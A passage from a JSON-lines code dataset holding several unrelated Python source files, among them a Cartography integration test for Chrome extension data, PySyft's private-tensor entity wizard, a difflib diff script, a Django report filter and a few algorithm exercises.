'f06981cbc72a3c6e2e9e736cbdaef4865a4571bc',\n '1.0',\n 344,\n '{}',\n 110,\n 12,\n 47,\n 85,\n 20,\n 80,\n '',\n '',\n 'https://lh3.googleusercontent.com/fake',\n '2016-02-22',\n 'CartographyIntegrationTest',\n '',\n ['Your data on all websites'],\n '',\n 4.6778846,\n 208,\n 'fake extension for Cartography integration testing',\n '13.95KiB',\n '',\n 38241,\n '',\n 'Extension',\n '',\n 'https://crxcavator.io/report/f06981cbc72a3c6e2e9e736cbdaef4865a4571bc/1.0',\n ),\n ])\n assert actual_nodes == expected_nodes\n\n\ndef test_transform_and_load_user_extensions(neo4j_session):\n \"\"\"\n Ensure we can transform and load users and extension mapping.\n \"\"\"\n users_res = tests.data.crxcavator.crxcavator.USER_RESPONSE\n type(users_res)\n users_list, extensions_list, user_extensions_list = \\\n cartography.intel.crxcavator.crxcavator.transform_user_extensions(users_res)\n cartography.intel.crxcavator.crxcavator.load_user_extensions(\n users_list,\n user_extensions_list,\n neo4j_session,\n TEST_UPDATE_TAG,\n )\n\n query = \"\"\"\n MATCH(user:GSuiteUser{email:$GSuiteEmail})\n RETURN user.id, user.email\n \"\"\"\n expected_user_email = 'user@example.com'\n nodes = neo4j_session.run(query, GSuiteEmail=expected_user_email)\n\n actual_nodes = list(\n (\n n['user.email']\n ) for n in nodes\n )\n\n expected_nodes = list([\n (\n 'user@example.com'\n ),\n ])\n assert actual_nodes == expected_nodes\n\n\ndef test_user_to_extension(neo4j_session):\n \"\"\"\n Ensure that users are connected to extensions.\n \"\"\"\n _ensure_local_neo4j_has_test_extensions_data(neo4j_session)\n _ensure_local_neo4j_has_test_user_extensions_data(neo4j_session)\n query = \"\"\"\n MATCH(user:GSuiteUser)-[:INSTALLS]->(ext:ChromeExtension{id:$ExtensionId})\n RETURN user.email, ext.id, ext.name\n \"\"\"\n expected_extension_id = 'f06981cbc72a3c6e2e9e736cbdaef4865a4571bc|1.0'\n nodes = neo4j_session.run(\n query,\n ExtensionId=expected_extension_id,\n )\n actual_nodes = {\n (\n n['user.email'],\n n['ext.id'],\n n['ext.name'],\n ) for n in nodes\n }\n\n expected_nodes = {\n (\n 'user@example.com',\n 'f06981cbc72a3c6e2e9e736cbdaef4865a4571bc|1.0',\n 'CartographyIntegrationTest',\n ),\n }\n assert actual_nodes == expected_nodes\n","repo_name":"lyft/cartography","sub_path":"tests/integration/cartography/intel/crxcavator/test_crxcavator.py","file_name":"test_crxcavator.py","file_ext":"py","file_size_in_byte":5894,"program_lang":"python","lang":"en","doc_type":"code","stars":2765,"dataset":"github-code","pt":"52"} +{"seq_id":"12819137197","text":"def solution(answers):\n answer = []\n\n first_man = [1,2,3,4,5]\n second_man = [2,1,2,3,2,4,2,5]\n third_man = [3,3,1,1,2,2,4,4,5,5]\n\n first_count = cal_answer(first_man, answers)\n second_count = cal_answer(second_man, answers)\n third_count = cal_answer(third_man, answers)\n\n max_count = max(first_count, second_count, third_count)\n if first_count >= max_count:\n answer.append(1)\n if second_count >= max_count:\n answer.append(2)\n if third_count >= max_count:\n answer.append(3)\n\n return answer\n\n\ndef cal_answer(pattern, answers):\n correct_count = 0\n\n for i in range(len(answers)):\n correct_answer = answers[i]\n answer = pattern[i%len(pattern)]\n if correct_answer == answer:\n correct_count += 1\n\n return correct_count\n\n\nprint(solution([1,2,3,4,5]))\nprint(solution([1,3,2,4,2]))","repo_name":"galid1/Algorithm","sub_path":"python/programmers/level1/모의고사.py","file_name":"모의고사.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"70216750566","text":"from triangle import Triangle, EquilateralTriangle\nfrom rectangle import Rectangle, Square\nfrom circle import Circle\nfrom regular_pentagon import RegularPentagon\nfrom rhombus import Rhombus\n\ndef display_menu():\n user_input = input(\"Learn Geometry.\\n What do you want to do?\\n (1) Add new shape\\n (2) Show all shapes\\n (3) Show shape with the largest perimeter\\n (4) Show shape with the largest area\\n (5) Show formulas\\n (0) Exit program\\n\")\n return user_input\n\ndef inform_the_selection_is_invalid():\n print(\"\\nInvalid selection. Please select a number 0-5\\n\")\n\ndef choose_shape_type_to_add():\n shape_type = input(\"What shape would you like to add? \")\n if shape_type == \"circle\":\n r = float(input(\"Please enter the radius of the circle: \"))\n shape = Circle(r)\n\n elif shape_type == \"triangle\":\n a = float(input(\"Please enter the length of side a: \"))\n b = float(input(\"Please enter the length of side b: \"))\n c = float(input(\"Please enter the length of side c: \"))\n shape = Triangle(a, b, c)\n\n elif shape_type == \"equilateral triangle\":\n a = float(input(\"Please enter the side length of the triangle: \"))\n shape = EquilateralTriangle(a)\n\n elif shape_type == \"rectangle\":\n a = float(input(\"Please enter the width of the rectangle: \"))\n b = float(input(\"Please enter the height of the rectangle: \"))\n shape = Rectangle(a,b)\n\n elif shape_type == \"square\":\n a = float(input(\"Please enter the side length of the square: \"))\n shape = Square(a)\n \n elif shape_type == \"regular pentagon\":\n a = float(input(\"Please enter the side length of the pentagon: \"))\n shape = RegularPentagon(a)\n\n elif shape_type == \"rhombus\":\n a = float(input(\"Please enter the side length of the rhombus: \"))\n d1 = float(input(\"Please enter the first diagonal length: \"))\n d2 = float(input(\"Please enter the second diagonal length: \"))\n shape = Rhombus(a,d1,d2)\n\n else:\n print(\"Invalid shape name\")\n return choose_shape_type_to_add()\n print(f\"{shape} has been added to the list\")\n return shape\n \n \ndef show_formulas():\n shape = input(\"Formula of which shape would you like to see? \")\n if shape == \"circle\":\n circle = Circle(1)\n print_perimeter_and_area_formula(circle)\n\n elif shape == \"triangle\":\n triangle = Triangle(1,2,3)\n print_perimeter_and_area_formula(triangle)\n\n elif shape == \"equilateral triangle\":\n equilateral_triangle = EquilateralTriangle(1)\n print_perimeter_and_area_formula(equilateral_triangle)\n\n elif shape == \"rectangle\":\n rectangle = Rectangle(1,2)\n print_perimeter_and_area_formula(rectangle)\n\n elif shape == \"square\":\n square = Square(1)\n print_perimeter_and_area_formula(square)\n\n elif shape == \"regular pentagon\":\n regular_pentagon = RegularPentagon(1)\n print_perimeter_and_area_formula(regular_pentagon)\n\n elif shape == \"rhombus\":\n rhombus = Rhombus(1,2,3)\n print_perimeter_and_area_formula(rhombus)\n\n else:\n print(\"Invalid shape name\")\n return show_formulas()\n\ndef print_perimeter_and_area_formula(shape):\n print ((f\"perimeter formula: {shape.get_perimeter_formula()}\\narea formula: {shape.get_area_formula()}\"))","repo_name":"karostacho/Geometry_OOP","sub_path":"display.py","file_name":"display.py","file_ext":"py","file_size_in_byte":3347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"70564660324","text":"# future\nfrom __future__ import annotations\n\n# stdlib\nimport textwrap\nfrom typing import Any\nfrom typing import List\nfrom typing import Optional\nfrom typing import Type\nimport uuid\n\n# third party\nfrom nacl.signing import VerifyKey\nimport numpy as np\nfrom numpy.typing import ArrayLike\n\n# relative\nfrom ..adp.entity import Entity\nfrom ..adp.vm_private_scalar_manager import VirtualMachinePrivateScalarManager\nfrom .manager import TensorChainManager\nfrom .passthrough import PassthroughTensor # type: ignore\nfrom .passthrough import is_acceptable_simple_type # type: ignore\n\n_SingleEntityPhiTensorRef = None\n\n\ndef _SingleEntityPhiTensor() -> Type[PassthroughTensor]:\n global _SingleEntityPhiTensorRef\n if _SingleEntityPhiTensorRef is None:\n # relative\n # relative\n from .autodp.single_entity_phi import SingleEntityPhiTensor\n\n _SingleEntityPhiTensorRef = SingleEntityPhiTensor\n return _SingleEntityPhiTensorRef\n\n\n_RowEntityPhiTensorRef = None\n\n\ndef _RowEntityPhiTensor() -> Type[PassthroughTensor]:\n global _RowEntityPhiTensorRef\n if _RowEntityPhiTensorRef is None:\n # relative\n # relative\n from .autodp.row_entity_phi import RowEntityPhiTensor\n\n _RowEntityPhiTensorRef = RowEntityPhiTensor\n return _RowEntityPhiTensorRef\n\n\n_AutogradTensorRef = None\n\n\ndef _AutogradTensor() -> Type[PassthroughTensor]:\n global _AutogradTensorRef\n if _AutogradTensorRef is None:\n # relative\n # relative\n from .autograd.tensor import AutogradTensor\n\n _AutogradTensorRef = AutogradTensor\n return _AutogradTensorRef\n\n\nclass AutogradTensorAncestor(TensorChainManager):\n \"\"\"Inherited by any class which might have or like to have AutogradTensor in its chain\n of .child objects\"\"\"\n\n @property\n def grad(self): # type: ignore\n child_gradient = self.child.grad\n if child_gradient is None:\n return None\n return self.__class__(child_gradient)\n\n @property\n def requires_grad(self) -> bool:\n return self.child.requires_grad\n\n def backward(self, grad=None): # type: ignore\n\n AutogradTensor = _AutogradTensor()\n\n # TODO: @Madhava question, if autograd(requires_grad=True) is not set\n # we still end up in here from AutogradTensorAncestor but child.backward\n # has no backprop_id\n if isinstance(self.child, AutogradTensorAncestor) or isinstance(\n self.child, AutogradTensor\n ):\n\n if grad is not None and not is_acceptable_simple_type(grad):\n grad = grad.child\n\n return self.child.backward(grad, backprop_id=uuid.uuid4()) # type: ignore\n else:\n raise Exception(\n \"No AutogradTensor found in chain, but backward() method called.\"\n )\n\n def autograd(self, requires_grad: bool = True) -> AutogradTensorAncestor:\n AutogradTensor = _AutogradTensor()\n\n self.push_abstraction_top(AutogradTensor, requires_grad=requires_grad) # type: ignore\n\n return self\n\n\ndef entity_creation_wizard(data: Any) -> List[Any]:\n\n w = textwrap.TextWrapper(initial_indent=\"\\t\", subsequent_indent=\"\\t\")\n\n welcome_msg = \"Welcome to the Data Subject Annotation Wizard!!!\"\n\n description1 = \"\"\"You've arrived here because you called Tensor.private() without passing in any entities!\nSince the purpose of .private() is to add metadata for the support of automatic differential\nprivacy budgeting, you need to describe which parts of your Tensor correspond to which\nreal-world data subjects (entities) whose privacy you want to protect. This is the only\nway the system knows, for example, that it costs twice as much privacy budget when twice\nas much of your data (say, 2 rows instead of 1 row) refer to the same entity.\"\"\"\n\n description2 = \"\"\"Entities can be people (such as a medical patient), places (such as a family's address), or\neven organizations (such as a business, state, or country). If you're not sure what kind of entity\nto include, just ask yourself the question, \"who am I trying to protect the privacy of?\". If it's\nan organization, make one entity per organization. If it's people, make one entity per person.\nIf it's a group of people who are somehow similar/linked to each other (such as a family),\nmake each entity a different group. For more information on differential privacy, see OpenMined's\ncourse on the subject: https://courses.openmined.org/\"\"\"\n\n description3 = \"\"\"Since you didn't pass in entities into .private() (or you did so incorrectly), this wizard is\ngoing to guide you through the process of annotating your data with entities.\"\"\"\n\n description4 = \"\"\"In this wizard, we're going to ask you for *unique identifiers* which refer to the entities\nin your data. While the unique identifiers need not be personal data (they can be random strings of letters and numbers\nif you like). It is ESSENTIAL that you use the same identifier when referring to the same entity in the\ndata that you never accidentally refer to two entities by the same identifier. Additionally, if you plan\nto do any kind of data JOIN with another dataset, it is ESSENTIAL that you are using the same unique\nidentifiers for entities as the data you're joining with. Since these unique identifiers may be personal\ninformation, PySyft might not be able to detect if two tensors are using different identifiers for the\nsame person.\"\"\"\n\n description5 = \"\"\"So, in this tutorial we're going to be asking you to specify Unique Identifiers (UIDs) for each entity\nin your data. This could be an email, street address, or any other string that identifies someone\nuniquely in your data and in the data you intend to use with your data (if any).\"\"\"\n\n print(\"\\t\" + \"=\" * 69)\n print(w.fill(welcome_msg))\n print(\"\\t\" + \"=\" * 69)\n print()\n print(w.fill(description1))\n print()\n print(w.fill(description2))\n print()\n print(w.fill(description3))\n print()\n print(w.fill(description4))\n print()\n print(w.fill(description5))\n print()\n\n print(\"\\tDo you understand, and are you ready to proceed? (yes/no)\")\n print()\n consent = str(input(\"\\t\"))\n print()\n\n if consent == \"no\":\n raise Exception(\"User cancelled entity creation wizard!\")\n\n print(\"\\tExcellent! Let's begin!\")\n # print(\"\\tYou passed in a tensor with the shape:\" + str(data.shape))\n print()\n\n print(\"\\t\" + \"-\" * 69)\n print()\n\n print(w.fill(\"Question 1: Is this entire tensor referring to the same entity?\"))\n print()\n print(w.fill(\"Examples:\"))\n print(\"\\t - a single medical scan of one patient\")\n print(\"\\t - a single spreadsheet of proprietary statistics about a business\")\n print(\"\\t - a tensor of facts about a country\")\n print()\n print(\n w.fill(\n \"\"\"(if the tensor is about one entity, but it also contains multiple other entities within,\nsuch as a tensor about all the customers of one business, ask yourself, are you trying to\nprotect the people or the business)\"\"\"\n )\n )\n print()\n print(\n w.fill(\n \"If yes, write the UID of the entity this data is about, otherwise write 'no' \"\n \" because this data is about more than one entity.\"\n )\n )\n print()\n single_uid = input(\"\\t\")\n print()\n if single_uid != \"no\":\n print(\"\\t\" + \"-\" * 69)\n print()\n print(\n w.fill(\n \"Excellent! Your data will be annotated as referring to:\"\n + str(single_uid)\n )\n )\n print()\n print(\n w.fill(\n \"Congratulations! You're all done with the Data Subject Annotation Wizard!!!\"\n \"In the future, you can accomplish this without the wizard by running:\"\n )\n )\n print()\n print(w.fill(\"\\t.private(entities='\" + str(single_uid) + \"')\"))\n print()\n print(\"\\t\" + \"=\" * 69)\n return [single_uid]\n\n print(\"\\t\" + \"-\" * 69)\n print()\n print(\n w.fill(\n \"Question 2: Does each row correspond to an entity, perhaps with occasional repeats (yes/no)?\"\n )\n )\n print()\n answer = str(input(\"\\t\"))\n print()\n print(\"\\t\" + \"-\" * 69)\n print()\n if answer == \"yes\":\n print(\n w.fill(\n \"Question 3: Excellent! Well, since your dataset has \"\n + str(data.shape[0])\n + \" rows, \"\n + \"would you like to hand enter an entity for each one (yes) or if there are too \"\n + \"many for you to hand-enter, we'll print some example code for you to run (no).\"\n )\n )\n\n print()\n\n answer = str(input(\"\\t\"))\n\n if answer == \"yes\":\n\n print()\n\n entities = list()\n for i in range(len(data)):\n print(\"\\t\\t\" + \"-\" * 61)\n print()\n print(w.fill(\"\\tData Row \" + str(i) + \":\" + str(data[i])))\n ent = input(\"\\t\\t What entity is this row about:\")\n entities.append(ent)\n print()\n print(\"\\t\\t\" + \"-\" * 61)\n print()\n print(\n w.fill(\n \"All done! Next time if you want to skip the wizard, call .private() like this:\"\n )\n )\n print()\n print(\n w.fill(\n \".private(entities=['\"\n + entities[0]\n + \"', '\"\n + entities[1]\n + \"', '\"\n + entities[-1]\n + \"'])\"\n )\n )\n print()\n print(\n w.fill(\n \" where you pass in entities as a list of strings, one per row. As long as you\"\n \" pass in the same number of entities as there are rows in your tensor, it will\"\n \" automatically detect you have and assume you mean one entity per row.\"\n )\n )\n return entities\n\n elif answer == \"no\":\n\n print()\n\n print(\n w.fill(\n \"Excellent. Well, in that case you'll need to re-run .private() but pass in\"\n \" a list of strings where each string is a unique identifier for an entity, and where\"\n \" the length of the list is equal to the number of rows in your tensor. Like so:\"\n )\n )\n\n print()\n print(w.fill(\".private(entities=['bob', 'alice', 'john'])\"))\n print()\n print(\n \" Now just to make sure I don't corrupt your tensor - I'm going to throw an exception.\"\n )\n print()\n raise Exception(\n \"Wizard aborted. Please run .private(entities=)\"\n \" again with your list of entity unique identifiers (strings),\"\n \"one per row of your tensor.\"\n )\n elif answer == \"no\":\n\n print(w.fill(\"Question 3: Is your data one entity for every column (yes/no)?\"))\n\n print()\n\n answer = str(input(\"\\t\"))\n\n print()\n\n if answer == \"yes\":\n print(\n w.fill(\n \"We don't yet support this form of injestion. Please transpose your data\"\n \" into one entity per row and re-run the wizard. Aborting:)\"\n )\n )\n\n raise Exception(\"Wizard aborted.\")\n\n elif answer == \"no\":\n\n print(\n w.fill(\n \"It sounds like your tensor is a random assortment of entities (and perhaps empty/non-entities). \"\n \"If you have empty values, just create random entities for them for now. If you have various \"\n \"entities scattered throughout your tensor (not organized by row), then you'll need to pass \"\n \"in a np.ndarray of strings which is identically shaped to your data in entities like so:\"\n )\n )\n\n print()\n print(\"\\t\\ttensor = sy.Tensor(np.ones((2,2)).astype(np.int32))\")\n print()\n print(\"\\t\\tentities = np.array([['bob', 'alice'],['charlie', 'danielle']])\")\n print()\n print(\"\\t\\ttensor.private(min_val=0, max_val=1, entities=entities))\")\n print()\n print(\n \"Aborting wizard now so that you rcan re-run .private with the right parameters.\"\n )\n print()\n raise Exception(\n \"Wizard aborted. Please run .private(entities=)\"\n \" again with your np.ndarray of entity unique identifiers (strings),\"\n \" one per value of your tensor and where your np.ndarray of entities is\"\n \" the same shape as your data.\"\n )\n print()\n\n print(\"\\t\" + \"_\" * 69)\n raise Exception(\n \"Not sure what happened... this code shouldn't have been reached. Try answering questions with \"\n \"options given by the prompts (such as yes/no).\"\n )\n\n\nclass PhiTensorAncestor(TensorChainManager):\n \"\"\"Inherited by any class which might have or like to have SingleEntityPhiTensor in its chain\n of .child objects\"\"\"\n\n def __init__(self, child: Any) -> None:\n self.child = child\n\n @property\n def shape(self) -> List[int]:\n return self.child.shape\n\n @property\n def min_vals(self): # type: ignore\n return self.__class__(self.child.min_vals)\n\n @property\n def max_vals(self): # type: ignore\n return self.__class__(self.child.max_vals)\n\n @property\n def gamma(self): # type: ignore\n return self.__class__(self.child.gamma)\n\n def publish(self, acc: Any, sigma: float, user_key: VerifyKey) -> PhiTensorAncestor:\n return self.__class__(\n self.child.publish(acc=acc, sigma=sigma, user_key=user_key)\n )\n\n def copy(self) -> PhiTensorAncestor:\n \"\"\"This should certainly be implemented by the subclass but adding this here to satisfy mypy.\"\"\"\n\n return NotImplemented\n\n def private(\n self,\n min_val: ArrayLike,\n max_val: ArrayLike,\n scalar_manager: VirtualMachinePrivateScalarManager = VirtualMachinePrivateScalarManager(),\n entities: Optional[Any] = None,\n skip_blocking_checks: bool = False,\n ) -> PhiTensorAncestor:\n\n return self.copy()._private(\n min_val=min_val,\n max_val=max_val,\n scalar_manager=scalar_manager,\n entities=entities,\n skip_blocking_checks=skip_blocking_checks,\n )\n\n def _private(\n self,\n min_val: ArrayLike,\n max_val: ArrayLike,\n scalar_manager: VirtualMachinePrivateScalarManager = VirtualMachinePrivateScalarManager(),\n entities: Optional[Any] = None,\n skip_blocking_checks: bool = False,\n ) -> PhiTensorAncestor:\n \"\"\" \"\"\"\n\n # PHASE 1: RUN CHECKS\n\n # Check 1: Is self.child a compatible type? We only support DP and SMPC for a few types.\n if (\n not isinstance(self.child, np.ndarray)\n or getattr(self.child, \"dtype\", None) != np.int32\n ):\n\n msg = (\n \"At present, you can only call .private() \"\n + \"on syft.Tensor objects wrapping np.int32 arrays. You called it on a \"\n + \"syft.Tensor wrapping a \"\n + str(type(self.child))\n )\n\n if isinstance(self.child, np.ndarray):\n msg += \" with dtype:\" + str(getattr(self.child, \"dtype\", None))\n\n raise TypeError(msg)\n\n # Check 2: If entities == None, then run the entity creation tutorial\n if entities is None:\n\n if skip_blocking_checks:\n raise Exception(\n \"Error: 'entities' argument to .private() must not be None!\"\n )\n print(\n \"ALERT: You didn't pass in any entities. Launching entity wizard...\\n\"\n )\n entities = entity_creation_wizard(self.child)\n\n # Check 3: If entities is a string, make it a list with one entity in it\n if isinstance(entities, str):\n entities = [Entity(entities)]\n elif isinstance(entities, Entity):\n entities = [entities]\n\n # Check 4: If entities are a list, are the items strings or Entity objects.\n # If they're strings lets create Entity objects.\n elif isinstance(entities, list):\n _entities = list()\n for e in entities:\n if isinstance(e, str):\n _entities.append(Entity(e))\n elif isinstance(e, Entity):\n _entities.append(e)\n elif isinstance(e, (list, np.ndarray)):\n # looks like it's actually a list of tensors, let's try to\n # cast the whole thing to an ndarray nd see if that works.\n entities = np.array(entities)\n break\n else:\n raise Exception(\"What kind of entity is this?!\")\n\n entities = _entities\n\n elif isinstance(entities, np.ndarray):\n if entities.shape != self.shape:\n raise Exception(\n \"Entities shape doesn't match data shape. If you're\"\n \" going to pass in something other than 1 entity for the\"\n \" entire tensor or one entity per row, you're going to need\"\n \" to make the np.ndarray of entities have the same shape as\"\n \" the tensor you're calling .private() on. Try again.\"\n )\n else:\n\n raise Exception(\n \"We don't yet support passing in a tensor of arbitrary entities. \"\n \"For now, call.flatten() on your tensor so you have one entity per row, \"\n \"or split your tensor into separate tensors for each value. We apologize \"\n \"for the inconvenience and will be adding this functionality soon!\"\n )\n\n # PHASE 2: CREATE CHILD\n if len(entities) == 1:\n # if there's only one entity - push a SingleEntityPhiTensor\n\n if isinstance(min_val, (float, int)):\n min_vals = (self.child * 0) + min_val\n else:\n raise Exception(\n \"min_val should be a float, got \" + str(type(min_val)) + \" instead.\"\n )\n\n if isinstance(max_val, (float, int)):\n max_vals = (self.child * 0) + max_val\n else:\n raise Exception(\n \"min_val should be a float, got \" + str(type(min_val)) + \" instead.\"\n )\n\n self.push_abstraction_top(\n _SingleEntityPhiTensor(),\n entity=entities[0], # type: ignore\n min_vals=min_vals,\n max_vals=max_vals,\n scalar_manager=scalar_manager, # type: ignore\n )\n\n # if there's row-level entities - push a RowEntityPhiTensor\n elif entities is not None and len(entities) == self.shape[0]:\n\n class_type = _SingleEntityPhiTensor()\n\n new_list = list()\n for i, entity in enumerate(entities):\n\n if isinstance(min_val, (float, int)):\n min_vals = (self.child[i : i + 1] * 0) + min_val # noqa: E203\n else:\n raise Exception(\n \"min_val should be a float, got \"\n + str(type(min_val))\n + \" instead.\"\n )\n\n if isinstance(max_val, (float, int)):\n max_vals = (self.child[i : i + 1] * 0) + max_val # noqa: E203\n else:\n raise Exception(\n \"min_val should be a float, got \"\n + str(type(min_val))\n + \" instead.\"\n )\n\n value = self.child[i : i + 1] # noqa: E203\n\n new_list.append(\n class_type(\n child=value,\n entity=entity,\n min_vals=min_vals,\n max_vals=max_vals,\n scalar_manager=scalar_manager,\n )\n )\n\n self.replace_abstraction_top(_RowEntityPhiTensor(), rows=new_list) # type: ignore\n\n # TODO: if there's element-level entities - push all elements with PhiScalars\n else:\n\n raise Exception(\n \"If you're passing in mulitple entities, please pass in one entity per row.\"\n )\n\n return self\n","repo_name":"datax-io/pysyft-parcel","sub_path":"packages/syft/src/syft/core/tensor/ancestors.py","file_name":"ancestors.py","file_ext":"py","file_size_in_byte":20888,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"20631801036","text":"import difflib\nimport sys\nimport webbrowser\n\ntry:\n text_file_1 = sys.argv[1]\n print(\"text_file_1: \" + text_file_1)\n text_file_2 = sys.argv[2]\n print(\"text_file_2: \" + text_file_2)\nexcept Exception as e:\n print(\"Error: \" + str(e))\n print(\"Usage: diff.py file_name1 file_name2\")\n sys.exit()\n\ndef read_file(filename):\n try:\n file_handle = open(filename, 'r')\n text = file_handle.read().splitlines()\n file_handle.close()\n return text\n except IOError as error:\n print(\"Read file Error: \" + str(error))\n sys.exit()\n\nif text_file_1 == \"\" or text_file_2 == \"\":\n print(\"Usage: diff.py file_name1 file_name2\")\n sys.exit()\n\ntext1_lines = read_file(text_file_1)\ntext2_lines = read_file(text_file_2)\nd = difflib.HtmlDiff()\n# print(d.make_file(text1_lines, text2_lines))\n\ndiff_result_html = open('diff_result.html', 'w', encoding='utf-8')\ndiff_result_html.write(d.make_file(text1_lines, text2_lines))\nwebbrowser.open('diff_result.html')\n","repo_name":"python012/garrulous_python","sub_path":"diff/diff.py","file_name":"diff.py","file_ext":"py","file_size_in_byte":998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"23704604000","text":"\"\"\"\n=============================================================\n\n~/tfat/filters/report_filter.py\nCreated: Jul-05-2021 16:27\n\nDESCRIPTION:\n\nFilters for TFAT Tag Reports\n\nA. Cottrill\n=============================================================\n\"\"\"\n\n\nimport django_filters\nfrom tfat.models import Report\n\nfrom ..utils import ValueInFilter\n\n\nclass ReportFilter(django_filters.FilterSet):\n\n lake = ValueInFilter(field_name=\"recoveries__lake__abbrev\", lookup_expr=\"in\")\n lake__not = ValueInFilter(field_name=\"recoveries__lake__abbrev\", exclude=True)\n\n spc = ValueInFilter(field_name=\"recoveries__species__spc\", lookup_expr=\"in\")\n spc__not = ValueInFilter(field_name=\"recoveries__species__spc\", exclude=True)\n\n report_year = django_filters.NumberFilter(\n field_name=\"report_date\", lookup_expr=\"year\"\n )\n report_year__gte = django_filters.NumberFilter(\n field_name=\"report_date\", lookup_expr=\"year__gte\"\n )\n report_year__lte = django_filters.NumberFilter(\n field_name=\"report_date\", lookup_expr=\"year__lte\"\n )\n\n report_year__gt = django_filters.NumberFilter(\n field_name=\"report_date\", lookup_expr=\"year__gt\"\n )\n report_year__lt = django_filters.NumberFilter(\n field_name=\"report_date\", lookup_expr=\"year__lt\"\n )\n\n from_dcr = django_filters.BooleanFilter(\n field_name=\"dcr\", lookup_expr=\"isnull\", exclude=True\n )\n\n class Meta:\n model = Report\n fields = [\n \"recoveries__lake__abbrev\",\n \"recoveries__species__spc\",\n \"report_date\",\n \"dcr\",\n ]\n","repo_name":"AdamCottrill/TFAT","sub_path":"tfat/filters/report_filter.py","file_name":"report_filter.py","file_ext":"py","file_size_in_byte":1593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"2037724708","text":"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n'***************************** Jewel Mahmud *****************************'\n'***************************** CSE-13th,MBSTU *****************************'\n'***************************** Date: 31-10-2021 *****************************'\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n# Base class\nclass Grandfather:\n def __init__(self, grandfathername):\n self.grandfathername = grandfathername\n \n# Intermediate class\nclass Father(Grandfather):\n def __init__(self, fathername, grandfathername):\n self.fathername = fathername\n \n # invoking constructor of Grandfather class\n Grandfather.__init__(self, grandfathername)\n \n# Derived class\nclass Son(Father):\n def __init__(self,sonname, fathername, grandfathername):\n self.sonname = sonname\n \n # invoking constructor of Father class\n Father.__init__(self, fathername, grandfathername)\n \n def print_name(self):\n print('Grandfather name :', self.grandfathername)\n print(\"Father name :\", self.fathername)\n print(\"Son name :\", self.sonname)\n \n# Driver code\ns1 = Son('Jahid', 'Menu Mia', 'Abdur Rashid')\n# print(s1.grandfathername)\ns1.print_name()","repo_name":"MahmudJewel/Python-practice","sub_path":"OOP/4-multilevel inheritance.py","file_name":"4-multilevel inheritance.py","file_ext":"py","file_size_in_byte":1280,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"26886537840","text":"#==================================================\n#==> Title: trapping-rain-water\n#==> Author: Zhang zhen \n#==> Email: hustmatnoble.gmail.com\n#==> GitHub: https://github.com/MatNoble\n#==> Date: 1/20/2021\n#==================================================\n\n\"\"\"\nhttps://leetcode-cn.com/problems/trapping-rain-water/\n\"\"\"\n\nclass Solution:\n def trapBruteForce(self, height):\n if not height: return 0\n res, n = 0, len(height)\n for i in range(n):\n l_max, r_max = 0, 0\n j = i\n while j >= 0:\n l_max = max(height[j], l_max)\n j -= 1\n j = i\n while j < n:\n r_max = max(height[j], r_max)\n j += 1\n res += min(l_max, r_max) - height[i]\n return res\n\n def trap(self, height):\n if not height: return 0\n res, n = 0, len(height)\n l_max, r_max = [height[0]]*n, [height[-1]]*n\n for i in range(1, n):\n l_max[i] = max(height[i], l_max[i-1])\n j = n-i-1\n r_max[j] = max(height[j], r_max[j+1])\n for i in range(n):\n res += min(l_max[i], r_max[i]) - height[i]\n return res\n\n def trapOptimal(self, height):\n if not height: return 0\n res, n = 0, len(height)\n left, right = 0, n-1\n l_max, r_max = height[0], height[-1]\n while left <= right:\n l_max = max(l_max, height[left])\n r_max = max(r_max, height[right])\n if l_max < r_max:\n res += l_max - height[left]\n left += 1\n else:\n res += r_max - height[right]\n right -= 1\n return res\n\nheight = [0,1,0,2,1,0,1,3,2,1,2,1]\nmat = Solution()\nprint(mat.trapBruteForce(height))\nprint(mat.trap(height))\nprint(mat.trapOptimal(height))\n","repo_name":"MatNoble/leetcode","sub_path":"LeetCodeSolutions/042.py","file_name":"042.py","file_ext":"py","file_size_in_byte":1878,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"23078105688","text":"from matrix_utils import *\nfrom matrix_GE import *\nfrom matrix_SOLE import *\nfrom cmu_112_graphics import *\nfrom animation_classes import *\nfrom animation_helpers import *\n\ndef appStarted(app):\n fitToScreen(app)\n screensInit(app)\n\n # app.buttons indices:\n # 0: home, 1: calc\n app.buttons = [[],[]]\n backHomeButtonInit(app)\n backButtonInit(app)\n solveButtonInit(app)\n clearButtonInit(app)\n stepsButtonInit(app)\n\n # *** VALID KEYS ***\n app.numKeys = {'0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '.', '-'}\n app.entryNavKeys = {'Up': -1, 'Down': +1, 'Left': -1, 'Right': +1}\n app.scrollKeys = {'Up': +10, 'Down': -10}\n\n # scrolling\n app.scrollY = 0\n\n # app.textBoxes indices:\n # 0: add, 1: mult, 2: tpose, 3: GE, 4: SOLE, 5: det, 6: dirGraph\n # innermost list stores dimension Text Boxes\n app.textBoxes = [[[]], [[],[]], [[]], [[]], [[]], [[]], [[]]]\n\n # Screen initializations\n homeScreenInit(app)\n calScreenInit(app)\n addScreenInit(app)\n mulScreenInit(app)\n tposeScreenInit(app)\n GEScreenInit(app)\n SOLEScreenInit(app)\n detScreenInit(app)\n dirGraphScreenInit(app)\n\ndef timerFired(app):\n mulScreenTimerFired(app)\n\ndef keyPressed(app, event):\n if app.screen == 'matAdd':\n 